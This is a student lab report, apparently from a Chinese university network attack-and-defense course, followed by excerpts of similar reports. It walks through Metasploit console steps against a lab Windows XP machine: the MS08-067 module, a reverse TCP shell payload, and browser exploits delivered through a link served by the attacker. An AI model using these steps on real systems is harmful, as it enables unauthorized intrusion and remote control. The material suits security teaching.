20155301 《网络攻防》 Exp5 MSF基础应用

20155301 《网络攻防》 Exp5 MSF基础应用

基础问题

1.用自己的话解释什么是exploit,payload,encode

答:exploit就是利用一些工具的,用来收集目标靶机的这种漏洞或者个人信息,并可以进行一些比如摄屏、提权等操作。

payload就是一个负载,可以负载程序或者数据等到目标靶机,实现攻击。

encode是一个加密的工具,可以加密信息或者文件。

Windows服务渗透攻击--ms07_029_msdns_zonename

基本信息

1.靶机型号:windows XP SP3(English)

2.靶机IP:192.168.229.138

3:主机:kali

4.主机IP:192.168.229.135

攻击步骤

1.首先要查看有哪些攻击方法,在路径 /usr/share/metasploit-framework/modules/exploit中可以看到攻击各个平台的方法,我们选择windows ,可以看到有很多适用于windows的攻击方法,但是这些攻击方法也是用于攻击不同版本的Windows的,所以我们要查找有哪些攻击 Windows XP SP3(English)的攻击方法,同时还是攻击服务器的。

2.具体的查看方法:进入msfconsole

使用

2.1

use XXXXXXXX

例如:

use exploit/windows/smb/ms08_067_netapi.rb

2.2 查看此方法可以攻击的靶机类型show targets

这里我们可以看到我们的攻击靶机序号是7,所以接下来输入set target 7或者set target 0(set target 0是自动选择靶机)

2.3设置payload,利用show payloads列出各种payload,并且有负载的等级,从中选择一个

使用set XXXXXXXX,例如:我选择的 set payload generic/shell_reverse_tcp

3.设置RHOST、LHOST、LPORT等,利用show options查看我们所必要输入的信息。

4.利用exploit进行攻击

5.此外还尝试了几个别的攻击:

MS08-067安全漏洞

ms04_011_lsass安全漏洞(失败了)

## 针对浏览器的攻击--

基本信息

1.靶机型号:windows XP SP3(English)

2.靶机IP:192.168.229.138

3:主机:kali

4.主机IP:192.168.229.135

实验步骤

1.如同前面的攻击方式大致相同,在 /usr/share/metasploit-framework/modules/exploits/windows/browser 查找利用浏览器漏洞进行攻击的工具,之后从中选择能应用于对应靶机的工具。

2.利用show targets查看适用范围

下面是我查看的几个攻击工具的适用范围

adobe_cooltype_sing.rb

ms11_050_mshtml_cobjectelement和mozilla_firefox_xmlserializer.rb

adobe_flash_avm2.rb和mozilla_interleaved_write.rb和mozilla_interleaved_write.rb

adobe_flash_casi32_int_overflow.rb和ms10_046_shortcut_icon_dllloader

可以看到其中的很多攻击方式都是Automatic,所以我试了几个

3.设置过程基本上差不多,但是要注意的是里面的SRVHOST和SRVPORT要设置成攻击者(自己的IP)和80端口,如果设置成别的在exploit后会提醒你如下的内容。

4.配置完毕后exploit,会显示服务器开始,此时你要切换到靶机中,输入类似图中的链接,这就是为什么我们要在SRVHOST中输入攻击者的IP,实际上是利用浏览器的漏洞创建一个URL钓鱼链接,一旦其他用户访问这个钓鱼链接,我们就可以通过漏洞进行攻击,获取靶机的权限。

5.攻击画面

利用ms10_046_shortcut_icon_dllloader进行攻击

利用adobe_cooltype_sing进行攻击(应该是失败了)

利用ms11_050_mshtml_cobjectelement进行攻击(失败了)

待续未完。。。。

原文地址:https://www.cnblogs.com/fengxingck/p/8977270.html

时间: 2024-10-07 22:56:56

20155301 《网络攻防》 Exp5 MSF基础应用的相关文章

2018-2019 20165235 网络对抗 Exp5 MSF基础

2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.168.21.128 永恒之蓝漏洞是利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码. 进入msfconsole输入 use exploit/windows/smb/ms17_010_eternalblue.并且通过show payloads 显示可用攻击载荷.

2018-2019 20165221 网络对抗 Exp5 MSF基础

2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms08_067; (1分 一个针对浏览器的攻击,如ms11_050:(1分) 一个针对客户端的攻击,如Adobe:(1分) 成功应用任何一个辅助模块.(0.5分) 具体实验操作 攻击机(kali):192.168.194.128 靶机(win7):192.168.194.129 任务一:主动攻击实践 W

20145306 《网络攻防》 MSF基础应用

20145306张文锦<网络对抗>MSF应用 Adobe阅读器渗透攻击 两台虚拟机,其中一台为kali,一台为windows xp sp3,并保证两台虚拟机可以ping通. 实验过程 进入msfconsole. 输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块;  使用命令set payload windows/meterpreter/reverse_tcp设置攻击载荷;设置端口,主机ip,产生pdf文件名. show

20155338 《网络攻防》Exp5 MSF基础应用

20155338 <网络攻防>Exp5 MSF基础应用 基础问题回答 1. 用自己的话解释什么是exploit,payload,encode? exploit将真正要负责攻击的代码传送到靶机中,相当于载具 payload负责执行相应的攻击代码,相当于载荷 encode是伪装,为了避免payload中坏字符影响功能,相当于编码 实验过程 Windows服务渗透攻击--MS08-067安全漏洞 攻击机:kali,ip:172.30.6.185 靶机:windows XP SP3,IP地址是172.

2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用

2018-2019-2 20165312<网络攻防技术>Exp5 MSF基础应用 目录 一.知识点总结 二.攻击实例 主动攻击的实践 ms08_067 generic/shell_reverse_tcp(成功) windows/meterpreter/reverse_tcp(失败) ms17_010_eternalblue(成功) generic/shell_reverse_tcp windows/x64/meterpreter/reverse_tcp windows/x64/meterpre

2018-2019-2 20165336《网络攻防技术》Exp5 MSF基础应用

2018-2019-2 20165336<网络攻防技术>Exp5 MSF基础应用 一.攻击实例 主动攻击的实践 ms08_067(成功) payload/generic/shell_reverse_tcp(成功) 攻击浏览器的实践 ms11_050(失败) ms11_046(成功) exploit/windows/browser/ms10_046_shortcut_icon_dllloader(成功且唯一) exploit/windows/smb/ms10_046_shortcut_icon_

2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用

2018-2019-2 20165212<网络攻防技术>Exp5 MSF基础应用 攻击成果 主动攻击的实践 ms17010eternalblue payload windows/x64/meterpreter/reverse_tcp(成功) payload generic/shellreversetcp(成功) ms17010psexec(成功且唯一) 攻击浏览器的实践 ms14064olecodeexecution payload windows/meterpreter/reverse_tc

2018-2019-2 20165332《网络攻防技术》Exp5 MSF基础应用

2018-2019-2 20165332<网络攻防技术>Exp5 MSF基础应用 1.基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击,相当于一个载具 payload:就是攻击的代码,是载荷. encode:为了帮助攻击载荷避免被杀软发现,进行伪装. 2.实践总结与体会 在辅助模块这里,可以发现很多旧版本的软件有漏洞,从而可以进行相关的攻击,在此次实验中就体验了旧版本有漏洞的一些软件进行了攻击并且很轻易就实现

2018-2019-2 20165329《网络攻防技术》Exp5 MSF基础应用

2018-2019-2 20165329<网络攻防技术>Exp5 MSF基础应用 一.实验 一个主动攻击实践,ms08_067 ; 一个针对浏览器的攻击,MS11-050 : 一个针对客户端的攻击,Adobe : 成功应用任何一个辅助模块(唯一). 离实战还缺些什么技术感觉大部分是按照教程来做的,离实战还很遥远 用自己的话解释什么是exploit,payload,encode.exploit攻击者对靶机进行渗透攻击的这一过程 payload类似于之前实验中的shellcode,是攻击者进行攻击